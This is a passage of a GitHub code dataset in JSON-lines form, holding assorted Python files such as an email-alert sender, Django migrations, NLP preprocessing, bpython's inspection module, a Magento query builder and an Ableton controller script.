'ColDocker-QA@omnipayments.com'\n recipients = ['dishant@omnipayments.com', 'ankita.harad@omnipayments.com']\n\n # * Create message container - the correct MIME type is multipart/alternative.\n msg = MIMEMultipart('alternative')\n msg['From'] = me\n msg['To'] = ', '.join(recipients)\n\n # * Record the MIME types of both parts - text/plain and text/html.\n part1 = MIMEText(html_content, 'html')\n msg['Subject'] = mail_subject\n msg.attach(part1)\n\n if attach_files != None:\n try:\n for singleFile in attach_files: # add files to the message\n baseFileName = os.path.basename(singleFile)\n # * Helps For Testing/Debug\n # print(f\"Files = {singleFile} | {baseFileName}\")\n attachment = MIMEApplication(open(singleFile, \"rb\").read(), _subtype=\"txt\")\n attachment.add_header('Content-Disposition', 'attachment', filename=baseFileName)\n msg.attach(attachment)\n except Exception as e1:\n # To Handel Multiple File Not Found Error\n print(\"Multiple File Attachment Failed. Error : {}\".format(e1))\n\n # * Send Mail With All Attachments\n try:\n s = smtplib.SMTP('192.168.3.60', 7025)\n # s = smtplib.SMTP('192.168.1.225', 8125)\n s.sendmail(me, recipients, msg.as_string())\n s.quit()\n\n except smtplib.SMTPException as e:\n print('Error :{}'.format(e), 'error')\n\n\nif __name__ == '__main__':\n pass\n\n","repo_name":"AnkitaOmni/gh-first-action","sub_path":"sendmail_alerts.py","file_name":"sendmail_alerts.py","file_ext":"py","file_size_in_byte":1995,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"33974437657","text":"import os\nimport re\ndict = {}\nreview_list =[]\nid = 0\nre_extract = re.compile('\\d+_(\\d+)') #score is mapped by ()\n\ndef evaluation(score):\n if int(score[0]) > 5:\n return 'pos'\n else:\n return 'neg'\n\ndef replace(text):\n return text.replace('
',\"\")\n\nfor senti in ['neg','pos']:\n directory = f\"C:\\\\Users\\\\submi\\\\OneDrive\\\\바탕 화면\\\\aclImdb\\\\test\\\\{senti}\"\n review_list = os.listdir(directory)\n\n for file in review_list:\n re_score = re_extract.findall(file)\n directory = f\"C:\\\\Users\\\\submi\\\\OneDrive\\\\바탕 화면\\\\aclImdb\\\\test\\\\{senti}\\\\{file}\"\n with open(directory,'rt') as f:\n try:\n review = f.read()\n except UnicodeDecodeError:\n print(id)\n id -= 1\n review = replace(review)\n value = evaluation(re_score)\n dict[id] = {'value':value, 'score':int(re_score[0]), 'text':review}\n id += 1\nwith open('C:\\\\Users\\\\submi\\\\PycharmProjects\\\\makeDataset\\\\dataset.txt','wt') as f:\n print(dict, file=f, end = '\\n')","repo_name":"subminu/LA_project","sub_path":"processing.py","file_name":"processing.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15911319106","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nfrom django.conf import settings\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('achieve', '0002_auto_20150513_1902'),\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('card', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='AchieveCollection',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AchieveCollectionItem',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ('achieve', models.ForeignKey(to='achieve.Achieve')),\n ('owner', models.ForeignKey(to=settings.AUTH_USER_MODEL,\n related_name='collectionAchieves')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.CreateModel(\n name='AchieveCollector',\n fields=[\n ('id', models.AutoField(primary_key=True,\n verbose_name='ID', auto_created=True, serialize=False)),\n ('collection', models.ForeignKey(to='card.AchieveCollection')),\n ('item', models.ForeignKey(to='card.AchieveCollectionItem',\n related_name='achieve_collection_item')),\n ],\n options={\n },\n bases=(models.Model,),\n ),\n migrations.AddField(\n model_name='achievecollection',\n name='items',\n field=models.ManyToManyField(\n to='card.AchieveCollectionItem', through='card.AchieveCollector'),\n preserve_default=True,\n ),\n migrations.AddField(\n model_name='achievecollection',\n name='owner',\n field=models.ForeignKey(\n to=settings.AUTH_USER_MODEL, related_name='achieve_collections'),\n preserve_default=True,\n ),\n ]\n","repo_name":"officefish/la_server","sub_path":"card/migrations/0002_auto_20150514_2122.py","file_name":"0002_auto_20150514_2122.py","file_ext":"py","file_size_in_byte":2417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72387497448","text":"# -*- coding: utf-8 -*-\n\ndef contar_letra(cadena, letra, sensitivo=False):\n cnt = 0\n for char in cadena:\n if sensitivo:\n if char==letra: \n cnt+=1\n else:\n if char.lower()==letra.lower(): \n cnt+=1\n return cnt\n\ndef obtener_cuentas(texto):\n cuenta = {}\n palabras = texto.split(' ')\n for p in palabras:\n if p in cuenta: cuenta[p] = cuenta[p] + 1\n else: cuenta[p] = 1\n return cuenta\n\ndef obtener_cuentas_archivo(direccion):\n with open(direccion, 'r') as archivo:\n contenido = archivo.read()\n return obtener_cuentas(contenido)\n\nprint(obtener_cuentas_archivo('github_licencia.txt'))\n","repo_name":"lennin92/curso_python","sub_path":"semana_1/ejercicios/funcion.py","file_name":"funcion.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38984724167","text":"from bot.keyboards.default import get_default_markup\nfrom loader import dp, _\nfrom models import User\nfrom aiogram.types import CallbackQuery\nfrom aiogram.dispatcher import FSMContext\n\n\n@dp.callback_query_handler(lambda c: c.data.startswith('main_menu'), state='*')\nasync def back_to_main_menu(callback_query: CallbackQuery, state: FSMContext, user: User) -> None:\n await callback_query.message.delete()\n text = _(\"You have returned to the main menu.\")\n await callback_query.message.answer(text, reply_markup=get_default_markup(user))\n await state.finish()\n\n\n@dp.callback_query_handler(lambda c: c.data == 'cancel')\nasync def cancel_handler(callback_query: CallbackQuery, state: FSMContext):\n prev_state = await state.get_state()\n await callback_query.message.delete()\n await state.reset_state(with_data=False)\n await state.set_state(prev_state) # set state back to previous state\n await callback_query.message.answer(_('Action cancelled.'))","repo_name":"IMZolin/Todolist-Telegram-bot","sub_path":"bot/handlers/tasks/state_handlers.py","file_name":"state_handlers.py","file_ext":"py","file_size_in_byte":969,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"1033819432","text":"import pandas as pd\r\nimport spacy\r\nimport nltk\r\nimport re\r\nimport os\r\n\r\ndirname = os.path.dirname(__file__)\r\nnlp = spacy.load('nl_core_news_lg')\r\n\r\ndef callback( str ):\r\n ''''Removes dots from string eg. mister A.B. becomes mister AB\r\n :param str: string\r\n :returns: string without dot'''\r\n\r\n return str.replace('.', '')\r\n\r\ndef detect_clauses(sent):\r\n ''''Splits sentence into clauses by grouping children of the heads.\r\n :param sent: string\r\n :returns: list of tuples of id and clause'''\r\n\r\n seen = set() # keep track of covered words\r\n chunks = []\r\n heads = [cc for cc in sent.root.children if cc.dep_ == 'conj']\r\n\r\n for head in heads:\r\n words = [ww for ww in head.subtree]\r\n for word in words:\r\n seen.add(word)\r\n chunk = (' '.join([ww.text for ww in words]))\r\n chunks.append((head.i, chunk))\r\n\r\n unseen = [ww for ww in sent if ww not in seen]\r\n chunk = ' '.join([ww.text for ww in unseen])\r\n chunks.append((sent.root.i, chunk))\r\n chunks = sorted(chunks, key=lambda x: x[0])\r\n return chunks\r\n\r\ndef get_token_id(row):\r\n '''Forms token id from sentence and token number\r\n :param row: row of dataframe\r\n :returns id: token id as string'''\r\n sent = str(row['Sent_id'])\r\n token = str(row['Token_id'])\r\n id = sent + '-' + token\r\n return id\r\n\r\ndef check_same_length(chunk_list, vim_ids):\r\n #lst = list(itertools.chain.from_iterable([chunk[2] for chunk in chunk_list]))\r\n if not len(chunk_list) == len(vim_ids):\r\n print('length of ids and chunk words does not match')\r\n print((len(vim_ids) - len(lst)))\r\n return (len(vim_ids) - len(lst))\r\n else:\r\n return False\r\n\r\ndef change_abbreviations(text):\r\n '''Processes text by lowercasing, removing dots from name abbreviations and replaces most common abbreviations by\r\n full word.\r\n :param text: string\r\n :returns: pre-processed string'''\r\n\r\n text = re.sub(r\"(?:[A-Z]\\.)+\", lambda m: callback(m.group()), text)\r\n text = text.lower()\r\n text = text.replace('cliënt', 'client').replace('patiënt', 'patient').replace(';', ':').replace('vos.', 'alarm').replace('pt.', 'client')\r\n text = text.replace('mw.', 'mevrouw').replace('mr.', 'meneer').replace('dhr.', 'meneer').replace('vzo.', 'zorgondersteuner').replace('v.z.o.', 'zorgondersteuner')\r\n text = text.replace('mvr.', 'mevrouw').replace('mnr.', 'meneer').replace('mevr.', 'mevrouw').replace('og.', 'ondergetekende').replace('pte.', 'client')\r\n text = text.replace('vpk.', 'verpleegkundige').replace('bgl.', 'begeleiding').replace('collega\\'s', 'collega').replace('pat.', 'client')\r\n text = text.replace('og.', 'begeleider').replace('o.g.', 'begeleider').replace('o.g', 'begeleider').replace('dda.', 'dienstdoende arts')\r\n text = text.replace('vzo.', 'verzorging').replace('medecl.', 'medeclient').replace('cl.', 'client').replace('o.g.', 'ondergetekende')\r\n #text = text.replace('ivm.', 'in verband met').replace('i.v.m.', 'in verband met').replace('bijv.', 'bijvoorbeeld').replace('d.w.z.', 'dat wil zeggen').replace('dwz.', 'dat wil zeggen')\r\n #text = text.replace('ipv.', 'in plaats van').replace('i.p.v.', 'in plaats van').replace('o.a.', 'onder andere').replace('oa.', 'onder andere').replace('n.a.v.', 'naar aanleiding van')\r\n #text = text.replace('m.b.t.', 'met betrekking tot').replace('mbt.', 'met betrekking tot').replace('t/m', 'tot en met')\r\n text = re.sub(r'(? None:\n self.value = value\n\n def __repr__(self) -> str:\n return self.value\n\n __str__ = __repr__\n\n\n@dataclass\nclass ArgSpec:\n args: List[str]\n varargs: Optional[str]\n varkwargs: Optional[str]\n defaults: Optional[List[_Repr]]\n kwonly: List[str]\n kwonly_defaults: Optional[Dict[str, _Repr]]\n annotations: Optional[Dict[str, Any]]\n\n\n@dataclass\nclass FuncProps:\n func: str\n argspec: ArgSpec\n is_bound_method: bool\n\n\nclass AttrCleaner(ContextManager[None]):\n \"\"\"A context manager that tries to make an object not exhibit side-effects\n on attribute lookup.\n\n Unless explicitly required, prefer `getattr_safe`.\"\"\"\n\n def __init__(self, obj: Any) -> None:\n self._obj = obj\n\n def __enter__(self) -> None:\n \"\"\"Try to make an object not exhibit side-effects on attribute\n lookup.\"\"\"\n type_ = type(self._obj)\n # Dark magic:\n # If __getattribute__ doesn't exist on the class and __getattr__ does\n # then __getattr__ will be called when doing\n # getattr(type_, '__getattribute__', None)\n # so we need to first remove the __getattr__, then the\n # __getattribute__, then look up the attributes and then restore the\n # original methods. :-(\n # The upshot being that introspecting on an object to display its\n # attributes will avoid unwanted side-effects.\n __getattr__ = getattr(type_, \"__getattr__\", None)\n if __getattr__ is not None:\n try:\n setattr(type_, \"__getattr__\", (lambda *_, **__: None))\n except (TypeError, AttributeError):\n __getattr__ = None\n __getattribute__ = getattr(type_, \"__getattribute__\", None)\n if __getattribute__ is not None:\n try:\n setattr(type_, \"__getattribute__\", object.__getattribute__)\n except (TypeError, AttributeError):\n # XXX: This happens for e.g. built-in types\n __getattribute__ = None\n self._attribs = (__getattribute__, __getattr__)\n # /Dark magic\n\n def __exit__(\n self,\n exc_type: Optional[Type[BaseException]],\n exc_val: Optional[BaseException],\n exc_tb: Optional[TracebackType],\n ) -> Literal[False]:\n \"\"\"Restore an object's magic methods.\"\"\"\n type_ = type(self._obj)\n __getattribute__, __getattr__ = self._attribs\n # Dark magic:\n if __getattribute__ is not None:\n setattr(type_, \"__getattribute__\", __getattribute__)\n if __getattr__ is not None:\n setattr(type_, \"__getattr__\", __getattr__)\n # /Dark magic\n return False\n\n\ndef parsekeywordpairs(signature: str) -> Dict[str, str]:\n preamble = True\n stack = []\n substack: List[str] = []\n parendepth = 0\n annotation = False\n for token, value in Python3Lexer().get_tokens(signature):\n if preamble:\n if token is Token.Punctuation and value == \"(\":\n # First \"(\" starts the list of arguments\n preamble = False\n continue\n\n if token is Token.Punctuation:\n if value in \"({[\":\n parendepth += 1\n elif value in \")}]\":\n parendepth -= 1\n elif value == \":\":\n if parendepth == -1:\n # End of signature reached\n break\n elif parendepth == 0:\n # Start of type annotation\n annotation = True\n\n if (value, parendepth) in ((\",\", 0), (\")\", -1)):\n # End of current argument\n stack.append(substack)\n substack = []\n # If type annotation didn't end before, it does now.\n annotation = False\n continue\n elif token is Token.Operator and value == \"=\" and parendepth == 0:\n # End of type annotation\n annotation = False\n\n if value and not annotation and (parendepth > 0 or value.strip()):\n substack.append(value)\n\n return {item[0]: \"\".join(item[2:]) for item in stack if len(item) >= 3}\n\n\ndef _fix_default_values(f: Callable, argspec: ArgSpec) -> ArgSpec:\n \"\"\"Functions taking default arguments that are references to other objects\n will cause breakage, so we swap out the object itself with the name it was\n referenced with in the source by parsing the source itself!\"\"\"\n\n if argspec.defaults is None and argspec.kwonly_defaults is None:\n # No keyword args, no need to do anything\n return argspec\n\n try:\n src, _ = inspect.getsourcelines(f)\n except (OSError, IndexError):\n # IndexError is raised in inspect.findsource(), can happen in\n # some situations. See issue #94.\n return argspec\n except TypeError:\n # No source code is available, so replace the default values with what we have.\n if argspec.defaults is not None:\n argspec.defaults = [_Repr(str(value)) for value in argspec.defaults]\n if argspec.kwonly_defaults is not None:\n argspec.kwonly_defaults = {\n key: _Repr(str(value))\n for key, value in argspec.kwonly_defaults.items()\n }\n return argspec\n\n kwparsed = parsekeywordpairs(\"\".join(src))\n\n if argspec.defaults is not None:\n values = list(argspec.defaults)\n keys = argspec.args[-len(values) :]\n for i, key in enumerate(keys):\n values[i] = _Repr(kwparsed[key])\n\n argspec.defaults = values\n if argspec.kwonly_defaults is not None:\n for key in argspec.kwonly_defaults.keys():\n argspec.kwonly_defaults[key] = _Repr(kwparsed[key])\n\n return argspec\n\n\n_getpydocspec_re = LazyReCompile(\n r\"([a-zA-Z_][a-zA-Z0-9_]*?)\\((.*?)\\)\", re.DOTALL\n)\n\n\ndef _getpydocspec(f: Callable) -> Optional[ArgSpec]:\n try:\n argspec = pydoc.getdoc(f)\n except NameError:\n return None\n\n s = _getpydocspec_re.search(argspec)\n if s is None:\n return None\n\n if not hasattr_safe(f, \"__name__\") or s.groups()[0] != f.__name__:\n return None\n\n args = []\n defaults = []\n varargs = varkwargs = None\n kwonly_args = []\n kwonly_defaults = {}\n for arg in s.group(2).split(\",\"):\n arg = arg.strip()\n if arg.startswith(\"**\"):\n varkwargs = arg[2:]\n elif arg.startswith(\"*\"):\n varargs = arg[1:]\n elif arg == \"...\":\n # At least print denotes \"...\" as separator between varargs and kwonly args.\n varargs = \"\"\n else:\n arg, _, default = arg.partition(\"=\")\n if varargs is not None:\n kwonly_args.append(arg)\n if default:\n kwonly_defaults[arg] = _Repr(default)\n else:\n args.append(arg)\n if default:\n defaults.append(_Repr(default))\n\n return ArgSpec(\n args, varargs, varkwargs, defaults, kwonly_args, kwonly_defaults, None\n )\n\n\ndef getfuncprops(func: str, f: Callable) -> Optional[FuncProps]:\n # Check if it's a real bound method or if it's implicitly calling __init__\n # (i.e. FooClass(...) and not FooClass.__init__(...) -- the former would\n # not take 'self', the latter would:\n try:\n func_name = getattr(f, \"__name__\", None)\n except:\n # if calling foo.__name__ would result in an error\n func_name = None\n\n try:\n is_bound_method = (\n (inspect.ismethod(f) and f.__self__ is not None)\n or (func_name == \"__init__\" and not func.endswith(\".__init__\"))\n or (func_name == \"__new__\" and not func.endswith(\".__new__\"))\n )\n except:\n # if f is a method from a xmlrpclib.Server instance, func_name ==\n # '__init__' throws xmlrpclib.Fault (see #202)\n return None\n try:\n argspec = _get_argspec_from_signature(f)\n try:\n argspec = _fix_default_values(f, argspec)\n except KeyError as ex:\n # Parsing of the source failed. If f has a __signature__, we trust it.\n if not hasattr(f, \"__signature__\"):\n raise ex\n fprops = FuncProps(func, argspec, is_bound_method)\n except (TypeError, KeyError, ValueError):\n argspec_pydoc = _getpydocspec(f)\n if argspec_pydoc is None:\n return None\n if inspect.ismethoddescriptor(f):\n argspec_pydoc.args.insert(0, \"obj\")\n fprops = FuncProps(func, argspec_pydoc, is_bound_method)\n return fprops\n\n\ndef is_eval_safe_name(string: str) -> bool:\n return all(\n part.isidentifier() and not keyword.iskeyword(part)\n for part in string.split(\".\")\n )\n\n\ndef _get_argspec_from_signature(f: Callable) -> ArgSpec:\n \"\"\"Get callable signature from inspect.signature in argspec format.\n\n inspect.signature is a Python 3 only function that returns the signature of\n a function. Its advantage over inspect.getfullargspec is that it returns\n the signature of a decorated function, if the wrapper function itself is\n decorated with functools.wraps.\n\n \"\"\"\n args = []\n varargs = None\n varkwargs = None\n defaults = []\n kwonly = []\n kwonly_defaults = {}\n annotations = {}\n\n # We use signature here instead of getfullargspec as the latter also returns\n # self and cls (for class methods).\n signature = inspect.signature(f)\n for parameter in signature.parameters.values():\n if parameter.annotation is not parameter.empty:\n annotations[parameter.name] = parameter.annotation\n\n if parameter.kind == inspect.Parameter.POSITIONAL_OR_KEYWORD:\n args.append(parameter.name)\n if parameter.default is not parameter.empty:\n defaults.append(parameter.default)\n elif parameter.kind == inspect.Parameter.POSITIONAL_ONLY:\n args.append(parameter.name)\n elif parameter.kind == inspect.Parameter.VAR_POSITIONAL:\n varargs = parameter.name\n elif parameter.kind == inspect.Parameter.KEYWORD_ONLY:\n kwonly.append(parameter.name)\n kwonly_defaults[parameter.name] = parameter.default\n elif parameter.kind == inspect.Parameter.VAR_KEYWORD:\n varkwargs = parameter.name\n\n return ArgSpec(\n args,\n varargs,\n varkwargs,\n defaults if defaults else None,\n kwonly,\n kwonly_defaults if kwonly_defaults else None,\n annotations if annotations else None,\n )\n\n\n_get_encoding_line_re = LazyReCompile(r\"^.*coding[:=]\\s*([-\\w.]+).*$\")\n\n\ndef get_encoding(obj) -> str:\n \"\"\"Try to obtain encoding information of the source of an object.\"\"\"\n for line in inspect.findsource(obj)[0][:2]:\n m = _get_encoding_line_re.search(line)\n if m:\n return m.group(1)\n return \"utf8\"\n\n\ndef get_encoding_file(fname: str) -> str:\n \"\"\"Try to obtain encoding information from a Python source file.\"\"\"\n with open(fname, encoding=\"ascii\", errors=\"ignore\") as f:\n for _ in range(2):\n line = f.readline()\n match = _get_encoding_line_re.search(line)\n if match:\n return match.group(1)\n return \"utf8\"\n\n\ndef getattr_safe(obj: Any, name: str) -> Any:\n \"\"\"Side effect free getattr (calls getattr_static).\"\"\"\n result = inspect.getattr_static(obj, name)\n # Slots are a MemberDescriptorType\n if isinstance(result, MemberDescriptorType):\n result = getattr(obj, name)\n # classmethods are safe to access (see #966)\n if isinstance(result, (classmethod, staticmethod)):\n result = result.__get__(obj, obj)\n return result\n\n\ndef hasattr_safe(obj: Any, name: str) -> bool:\n try:\n getattr_safe(obj, name)\n return True\n except AttributeError:\n return False\n","repo_name":"bpython/bpython","sub_path":"bpython/inspection.py","file_name":"inspection.py","file_ext":"py","file_size_in_byte":12400,"program_lang":"python","lang":"en","doc_type":"code","stars":2476,"dataset":"github-code","pt":"53"} +{"seq_id":"4280391258","text":"from typing import Optional, Any, Dict, Sequence, Tuple\n\n__all__ = (\n 'Query', 'make_search_query', 'make_field_value_query',\n)\n\nQuery = Optional[Dict[str, Any]]\n\n\ndef make_search_query(filter_groups: Sequence[Sequence[Tuple[str, Any, Optional[str]]]],\n *,\n sort_orders: Optional[Sequence[Tuple[str, str]]] = None,\n page_size: Optional[int] = None,\n current_page: Optional[int] = None):\n \"\"\"\n Build a search query.\n\n Documentation: https://devdocs.magento.com/guides/v2.4/rest/performing-searches.html\n\n Filter groups are AND clauses while filters are OR clauses:\n\n [[(\"a\", 1, \"eq\"), (\"b\", 2, \"eq\")], [(\"c\", 3, \"eq\")]]\n\n Means ``(a=1 OR b=2) AND c=3``. There’s no way to do an OR between AND clauses.\n\n :param filter_groups: sequence of filters. Each filter is a sequence of conditions.\n Each condition is a tuple of (field, value, condition_type). The condition_type can be None if it's \"eq\"\n (the default). See the documentation for the list of possible condition_types.\n :param sort_orders: sequence of tuples (field, direction) for the sort order.\n The direction should be \"asc\" or \"desc\".\n :param page_size:\n :param current_page:\n :return:\n \"\"\"\n query_params: Dict[str, Any] = {}\n if page_size is not None:\n query_params[\"searchCriteria[pageSize]\"] = page_size\n\n if current_page is not None:\n query_params[\"searchCriteria[currentPage]\"] = current_page\n\n for filter_group_index, filter_group in enumerate(filter_groups):\n for filter_index, filter_ in enumerate(filter_group):\n for k, v in (\n (\"field\", filter_[0]),\n (\"value\", filter_[1]),\n (\"condition_type\", filter_[2]),\n ):\n # NOTE: from the doc, \"condition_type is optional if the operator is eq\".\n if k == \"condition_type\" and v is None:\n continue\n query_params[f\"searchCriteria[filter_groups][{filter_group_index}][filters][{filter_index}][{k}]\"] = v\n\n if sort_orders:\n for i, (field, direction) in enumerate(sort_orders):\n query_params[f\"searchCriteria[sortOrders][{i}][field]\"] = field\n query_params[f\"searchCriteria[sortOrders][{i}][direction]\"] = direction\n\n return query_params\n\n\ndef make_field_value_query(field: str, value,\n condition_type: Optional[str] = None,\n page_size: Optional[int] = None,\n current_page: Optional[int] = None,\n *,\n sort_orders: Optional[Sequence[Tuple[str, str]]] = None):\n \"\"\"\n Create a query params dictionary for Magento. This is a simplified version of ``make_search_query``.\n\n :param field:\n :param value:\n :param condition_type: \"eq\", \"neq\", or another.\n See https://devdocs.magento.com/guides/v2.4/rest/performing-searches.html for the full list.\n :param page_size:\n :param current_page:\n :param sort_orders: sequence of tuples (field, direction) for the sort order.\n :return:\n \"\"\"\n return make_search_query([[(field, value, condition_type)]],\n page_size=page_size, current_page=current_page, sort_orders=sort_orders)\n","repo_name":"Bixoto/PyMagento","sub_path":"magento/queries.py","file_name":"queries.py","file_ext":"py","file_size_in_byte":3374,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"20681240556","text":"from django.conf.urls import url\nfrom comments import views\n\nurlpatterns = [\n url(r'^$', views.RetrieveComments.as_view(), name='all'),\n url(r'^create/', views.CreateComment.as_view(), name='create'),\n url(r'^post/', views.PostComment.as_view(), name='test'),\n url(r'^(?P\\d+)/children', views.RetrieveChildrenComment.as_view(), name='children_comment'),\n\n]\n","repo_name":"wandeei/QA","sub_path":"comments/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":373,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12211089602","text":"from copy import deepcopy\ndef game(g, size, field):\n # 방향 설정\n di = [-1,-1, -1, 0,0,1,1,1]\n dj = [-1,0,1,-1,1,-1,0,1]\n for _ in range(g-1):\n new = [[0 for _ in range(size)] for _ in range(size)] # 다음 세대 필드 초기 설정\n for i in range(size):\n for j in range(size):\n cnt = 0 # 갯수 저장하는 변수\n for k in range(8):\n fi , fj = i + di[k], j + dj[k] # 각 주위 방향\n if 0<=fi LAYOUT_ISO_3_CHROM:\n self._PadMode__layout = LAYOUT_SPREAD\n else:\n self._PadMode__layout = new_value\n self.canonical_parent.show_message(' Pad Layout: ' + LAYOUT_NAME[self._PadMode__layout] + ' / ' + self._current_scale_name(SCALES[self.current_scale_index]))\n self.update_transpose()\n\n def _current_scale_name(self, scale):\n return scale.name + ' ' + BASE_NOTE[self._base_note] + str(self._octave - 2)\n\n def inc_base_note(self, inc):\n new_value = self._base_note + inc\n if new_value < 0:\n new_value = 11\n self._octave = max(0, self._octave - 1)\n else:\n if new_value > 11:\n new_value = 0\n self._octave = self._octave + 1\n self._base_note = new_value\n scale = SCALES[self.current_scale_index]\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(scale))\n self.update_transpose()\n\n def inc_octave(self, inc):\n new_value = self._octave + inc\n if new_value >= 0:\n if new_value < 8:\n self._octave = new_value\n scale = SCALES[self.current_scale_index]\n self.update_transpose()\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(scale))\n\n def inc_scale(self, inc, update=True):\n nr_of_scales = len(SCALES) - 1\n prev_value = self.current_scale_index\n self.current_scale_index = min(nr_of_scales, max(0, self.current_scale_index + inc))\n if prev_value != self.current_scale_index:\n new_scale = SCALES[self.current_scale_index]\n self.canonical_parent.show_message(' PAD Mode Scale: ' + self._current_scale_name(new_scale))\n if update:\n self.update_transpose()\n\n def get_octave(self):\n return SCALES[self.current_scale_index].to_octave(self._octave)\n\n def update_transpose(self):\n if self._active:\n self.clear_transpose()\n self.assign_transpose(SCALES[self.current_scale_index])\n self.canonical_parent._set_suppress_rebuild_requests(True)\n self.canonical_parent.request_rebuild_midi_map()\n self.canonical_parent._set_suppress_rebuild_requests(False)\n\n def fitting_mode(self, track):\n if not track:\n return self\n drum_device = find_drum_device(track)\n if drum_device is not None:\n if self._alternate_mode is not None:\n return self._alternate_mode\n return self\n\n def refresh(self):\n if self._active:\n matrix = self.canonical_parent.get_button_matrix()\n matrix.prepare_update()\n for button, (_, _) in matrix.iterbuttons():\n if button:\n button.send_value(0, True)\n\n matrix.commit_update()\n\n def get_in_notes(self):\n cs = self.song().view.highlighted_clip_slot\n if cs.has_clip:\n if cs.clip.is_midi_clip:\n in_notes = set()\n notes = cs.clip.get_notes_extended(0, 127, 0.0, cs.clip.length)\n for note in notes:\n in_notes.add(note.pitch)\n\n return in_notes\n\n def clear_transpose(self):\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.remove_value_listener(self.handle_button)\n\n def assign_transpose(self, scale):\n assert isinstance(scale, PadScale)\n self._scale = scale\n if self._active:\n matrix = self.canonical_parent.get_button_matrix()\n self.layout_normal(matrix)\n\n def layout_normal(self, matrix):\n matrix.prepare_update()\n scale_len = len(self._scale.notevalues)\n octave = self._octave\n for button, (column, row) in matrix.iterbuttons():\n if button:\n if button.state == 0:\n button.remove_value_listener(self._dummy_lister)\n elif self._PadMode__layout == LAYOUT_SPREAD:\n note_index = (7 - row) * 8 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_INKEY:\n note_index = (7 - row) * (self.current_scale_index == 0 and 4 or 2) + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_4_INKEY:\n note_index = (7 - row) * (self.current_scale_index == 0 and 5 or 3) + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_CHROM:\n note_index = (7 - row) * 4 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_4_CHROM:\n note_index = (7 - row) * 5 + column\n else:\n if self._PadMode__layout == LAYOUT_ISO_3_CHROM or self._PadMode__layout == LAYOUT_ISO_4_CHROM:\n scale_index = note_index % 12\n octave_offset = note_index // 12\n note_value = SCALES[0].notevalues[scale_index] + self._base_note + octave * 12 + octave_offset * 12\n scale_index = note_index % scale_len\n octave_offset = note_index // scale_len\n note_value = self._scale.notevalues[scale_index] + self._base_note + octave * 12 + octave_offset * 12\n if note_value < 128:\n button.set_to_notemode(True)\n button.set_send_note(note_value)\n button.state = 1\n button.send_value(0, True)\n else:\n button.set_send_note(button.get_identifier())\n button.set_to_notemode(False)\n button.state = 0\n button.add_value_listener(self._dummy_lister)\n button.send_color_direct(0)\n\n matrix.commit_update()\n\n def auto_select(self):\n return True\n\n def _dummy_lister(self, value):\n pass\n\n def set_modifier_component(self, component):\n self._PadMode__modifier_component = component\n\n def handle_shift(self, shift_value):\n if shift_value:\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.add_value_listener(self.handle_button, True)\n\n else:\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.remove_value_listener(self.handle_button)\n\n self.update_transpose()\n\n def __determine_focus_track(self):\n return self.song().view.selected_track\n\n def handle_button(self, value, button):\n if value != 0:\n col, row = button.get_position()\n if row == 0:\n self._PadMode__modifier_component.handle_edit_action(col)\n\n @subject_slot('selected_track')\n def on_track_changed(self):\n self._focus_track = self._PadMode__determine_focus_track()\n self.refresh()\n\n def enter(self):\n self._active = True\n self._focus_track = self._PadMode__determine_focus_track()\n self.on_track_changed.subject = self.song().view\n matrix = self.canonical_parent.get_button_matrix()\n for button, (_, _) in matrix.iterbuttons():\n if button:\n button.set_to_notemode(True)\n self.canonical_parent._forwarding_registry[(MIDI_NOTE_ON_STATUS, button.get_identifier())] = button\n self.canonical_parent._forwarding_registry[(MIDI_NOTE_OFF_STATUS, button.get_identifier())] = button\n\n self.update_transpose()\n\n def exit(self):\n self._active = False\n self.on_track_changed.subject = None\n for button, (_, _) in self.canonical_parent.get_button_matrix().iterbuttons():\n if button:\n button.set_to_notemode(False)\n button.remove_value_listener(self.handle_button)\n# okay decompiling src/PadMode.pyc\n","repo_name":"frankois/ni","sub_path":"midi_remote_scripts/maschine/maschine_jam/scripts/PadMode.py","file_name":"PadMode.py","file_ext":"py","file_size_in_byte":12117,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"29770715525","text":"#This program reverse the key-value pair of a dictionary assuming the values are non unique\r\n\r\n#This function converts the string to a dictionary where the key if the letter and the value is the number of times it appears \r\ndef dictionary(s):\r\n d=dict()\r\n for letter in s:\r\n if letter not in d:\r\n d[letter]=1\r\n else:\r\n d[letter]+=1\r\n return d\r\n\r\n#This function reverse the dicitonary for non-unique values\r\ndef inverse_Dictionary(d):\r\n inverse=dict()\r\n for k, v in d.items(): #d.items() fetches all 